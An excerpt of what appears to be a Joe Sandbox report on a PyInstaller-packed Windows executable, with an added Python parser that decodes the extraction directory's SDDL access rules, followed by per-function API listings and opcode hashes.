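The two SDDL format strings, the S-1-3-4 literal and the PYI_PATH_MAX error text recovered for this function match PyInstaller's bootloader routine that builds the DACL for its onefile extraction directory, with the current user's SID taken from the process token (the OpenProcessToken / GetTokenInformation / ConvertSidToStringSidW subcalls listed above). The parser below is an added example for this report, not code from the sample, from PyInstaller or from Joe Sandbox; it decodes such a DACL string and checks that nothing beyond the current user and OWNER RIGHTS is granted. The user SID is constructed, and the rights abbreviations, access-mask constants and SID aliases are the documented SDDL/Win32 values.

```python
"""Decode the SDDL DACL strings recovered from the function above.

Added example for this report; not code from the sample, PyInstaller or
Joe Sandbox. The user SID is constructed (the sample fetches the real
one via OpenProcessToken / GetTokenInformation / ConvertSidToStringSidW).
"""
import re
from dataclasses import dataclass

# SDDL ACE-type abbreviations (documented Windows SDDL tokens).
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}

# SDDL rights abbreviations -> (name, access mask); documented Win32 values.
RIGHTS = {
    "FA": ("FILE_ALL_ACCESS", 0x001F01FF),
    "FR": ("FILE_GENERIC_READ", 0x00120089),
    "FW": ("FILE_GENERIC_WRITE", 0x00120116),
    "FX": ("FILE_GENERIC_EXECUTE", 0x001200A0),
    "GA": ("GENERIC_ALL", 0x10000000),
    "GR": ("GENERIC_READ", 0x80000000),
    "GW": ("GENERIC_WRITE", 0x40000000),
    "GX": ("GENERIC_EXECUTE", 0x20000000),
}

# Well-known SIDs that matter when judging how broad a DACL is.
WELL_KNOWN_SIDS = {
    "S-1-3-4": "OWNER RIGHTS",
    "S-1-1-0": "Everyone",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
}
# Two-letter trustee aliases SDDL allows instead of a full SID.
SID_ALIASES = {"WD": "S-1-1-0", "AU": "S-1-5-11", "SY": "S-1-5-18",
               "BA": "S-1-5-32-544", "BU": "S-1-5-32-545"}

ACE_RE = re.compile(r"\(([^()]*)\)")


@dataclass(frozen=True)
class Ace:
    ace_type: str
    flags: str
    rights: tuple
    mask: int
    sid: str
    trustee: str


def decode_rights(field: str):
    """Rights field is either a hex mask or a run of two-letter tokens."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return (f"0x{mask:08X}",), mask
    if len(field) % 2:
        raise ValueError(f"malformed rights field: {field!r}")
    names, mask = [], 0
    for i in range(0, len(field), 2):
        tok = field[i:i + 2]
        if tok not in RIGHTS:
            raise ValueError(f"unknown rights token: {tok!r}")
        names.append(RIGHTS[tok][0])
        mask |= RIGHTS[tok][1]
    return tuple(names), mask


def parse_dacl(sddl: str):
    """Parse a 'D:' SDDL section into Ace records.

    Each ACE is (type;flags;rights;object_guid;inherit_guid;sid). Only the
    DACL section is handled, which is all the recovered strings contain.
    """
    if not sddl.startswith("D:"):
        raise ValueError("expected an SDDL string starting with 'D:'")
    aces = []
    for m in ACE_RE.finditer(sddl[2:]):
        parts = m.group(1).split(";")
        if len(parts) != 6:
            raise ValueError(f"ACE needs 6 fields, got {len(parts)}: {m.group(0)}")
        ace_type, flags, rights, _obj_guid, _inh_guid, sid = parts
        sid = SID_ALIASES.get(sid, sid)
        names, mask = decode_rights(rights)
        aces.append(Ace(ACE_TYPES.get(ace_type, ace_type), flags, names, mask,
                        sid, WELL_KNOWN_SIDS.get(sid, "(account SID)")))
    return aces


def build_bootloader_dacl(user_sid: str, with_owner_rights: bool) -> str:
    """Fill the two format strings recovered from the function:
    'D:(A;;FA;;;%s)' and 'D:(A;;FA;;;%s)(A;;FA;;;%s)' (second SID S-1-3-4)."""
    if with_owner_rights:
        return "D:(A;;FA;;;%s)(A;;FA;;;%s)" % (user_sid, "S-1-3-4")
    return "D:(A;;FA;;;%s)" % user_sid


def restricted_to(sddl: str, user_sid: str) -> bool:
    """True if every ACE is an allow ACE for user_sid or OWNER RIGHTS,
    i.e. no group such as Everyone or BUILTIN\\Users is granted anything."""
    aces = parse_dacl(sddl)
    return bool(aces) and all(
        a.ace_type == "ACCESS_ALLOWED" and a.sid in (user_sid, "S-1-3-4")
        for a in aces)


# Constructed SID for illustration, not one observed in the report.
EXAMPLE_USER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"

if __name__ == "__main__":
    sddl = build_bootloader_dacl(EXAMPLE_USER_SID, with_owner_rights=True)
    for ace in parse_dacl(sddl):
        print(ace.ace_type, ace.trustee, ace.sid, ace.rights, hex(ace.mask))
    print("restricted to current user:", restricted_to(sddl, EXAMPLE_USER_SID))
    # An extra Everyone read ACE ("WD") would fail the check.
    print("with Everyone ACE:", restricted_to(sddl + "(A;;FR;;;WD)", EXAMPLE_USER_SID))
```

Run as a script, the block rebuilds the two-ACE string the function emits, lists each ACE with its decoded trustee and access mask, and shows the check rejecting a DACL that additionally grants Everyone read access. On a live host the string to feed parse_dacl is the security descriptor of the extraction directory the bootloader creates under %TEMP%, which is also where the unpacked Python payload of this sample would be found.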

                                                                                                                                                                                                                                  Control-flow Graph

Control-flow graph of the function at 00007FF72C66CF60 (rendered graph, nodes marked Executed / Not Executed, spanning 00007FF72C66CF60 to 00007FF72C66D265). Recoverable from the graph: the function calls GetConsoleMode, WriteFile and GetLastError, plus internal subroutines of the same module.
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72C66CF4B), ref: 00007FF72C66D07C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72C66CF4B), ref: 00007FF72C66D107
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                                                  • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                  • Instruction ID: dad23c8e41addc558e5eaa13b3d2361447927d0d7230b50109a2f48c02d4c527
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0791D632E1865195F752AF669C4027DBBB2FB647A8FA4413DDE0E53684CE3CD442CB20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction ID: c6b58e72bd74b63d40caca36ecf0d3e284f8668a89b904be69434ffa4d3f7fcd
• Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction Fuzzy Hash: C341A462D1878283E711AB209911379B671FBA4774F609339E79C43AD5DF7CA0E08B50
APIs
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction ID: 6e30d9ec16d69f3e57071b0ca5c78008316a9556d923d944832d7baf699061e8
• Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction Fuzzy Hash: 66313B20E0894351FA16BB659D223B9A693FFB53E4FE45538DB0D472D7DE2CA404CA30
APIs
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
• Instruction ID: 8cb72e42a88260e657941455c56dc945eeb9e11eab43b4414d31d160ea84eed6
• Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
• Instruction Fuzzy Hash: B3D06720B0874652EA1A3B715C5A178A2A7FFA8731BA4183CCC0A06393DD2CA84D8A20
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
• Instruction ID: e729ccd8e8d10f86d6f780a2c21e2924e2a28b74ba22fc5a9621f802ae7e9ed1
• Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
• Instruction Fuzzy Hash: DF51EB21B0924286E726B9659C0067AF5A2FF54BB4FA84638DE6D037C5CE3CE4018E64
APIs
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
• Instruction ID: 2543a96461a1dba0fe938641a66756ce545f6c037bca7570d7cb3361ced89ee7
• Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
• Instruction Fuzzy Hash: 03119072608E8281DA21AB26AC14169F763FB95BF4FA44335EA7D0B7D9CE3CD0518B10
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
• GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
• Instruction ID: 8e55812d8af6b0e18ed7b78169a6367a69c14bc98dbbdadb1cdcecf412e5f4b7
• Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
• Instruction Fuzzy Hash: 16E04F10E5920242FE07BBB16C55178A262FFE4B20FE44538C90E422A2EE2C68858A30
APIs
• CloseHandle.KERNELBASE(?,?,?,00007FF72C66A9D5,?,?,00000000,00007FF72C66AA8A), ref: 00007FF72C66ABC6
• GetLastError.KERNEL32(?,?,?,00007FF72C66A9D5,?,?,00000000,00007FF72C66AA8A), ref: 00007FF72C66ABD0
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction ID: ff124b5c4a0a30bc84c456b381c3c23e6591b99b348b6acf705da7a27a7e4cef
• Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction Fuzzy Hash: 8021C511B0864201EA5277719C9027DF6A3FFA47B0FA8423DD92E477C2CF6CE4814B20
APIs
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                  • Instruction ID: 0b099c07253b9450cd99cc86397d56a4bbef62ef019b7b493efab67f8f9d6e6f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B41B732908242C7EA25AA15AD50179B3B2FFA57A0FA00139D68E436D1CF7DF442DF61
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                                                                  • Opcode ID: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                  • Instruction ID: 0d6c5bf25cbbd315964dbcc9a4990ae0d34bc11159dc6c2776a6e7451cc13498
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0021E721B5865246FA52BB226D043BAE652FF59BE4FE84434EF0C07B86DE7DE441CB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                  • Instruction ID: b3ffcdc2ea8637889cabde6186c1adbce4fd9242ccead691b6bb038f74b24c3b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B313D22A1864285E612BB558C4137CB6A2FFA1BB4FE14239E95D077D2CE7CA4419F21
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                                                  • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                  • Instruction ID: b006f94b5d6774d63f00850fd151fd3e9a064759f2957e571430838450647163
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B218072A04B4589EB1AAF64C8803AC73B1FB54728FA4063ADB5D46BC5DF3CD544CB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                  • Instruction ID: 5b0f5432e87c91338271815ebe442a583a7df5e68f8bee1df1fb53b5ba528f3c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20118431A1C64281EA62BF11980117DF672FFA5BA4FE44439EB4C57A96CF3DE4414F60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
• Instruction ID: 5c1c71568547bf9acd071346c80e0db66393377e80d0c22d7bd9bb91f2029a27
• Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
• Instruction Fuzzy Hash: 1D210732618A4286DB22AF18D841379B3A2FBA4B70FA44638E75D476D9DF3CD415CF10
APIs
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 88af2b9d623369b6d1cd895eab9ed39b027310b3992d6538d0e58b66fffe3d1f
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: 97018221A0874180EA16EB529D01079F6A2FFA5FF0FA84679DE5C13BD6CE3CD4118B54
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF72C66B32A,?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A), ref: 00007FF72C66EBED
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
• Instruction ID: af1b5697a959bb7637e601919f99bef49b76924b6adf7a91745dae5e59c700d1
• Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
• Instruction Fuzzy Hash: 26F04F58B0928240FE5B76B59D552B4E2A2FFA8B60FEC4538C90F462C1DD1CE4804A30
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF72C660C90,?,?,?,00007FF72C6622FA,?,?,?,?,?,00007FF72C663AE9), ref: 00007FF72C66D63A
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction ID: 3cdae481fe8222b867514f97429f4788fea26aad7f90dec245290c66738413e8
• Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction Fuzzy Hash: 7BF0DA50E0924645FE5676725C51675A1A2EFA47B4FA84638DD2E866C2DD2CA4808A30
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: AddressErrorLastProc
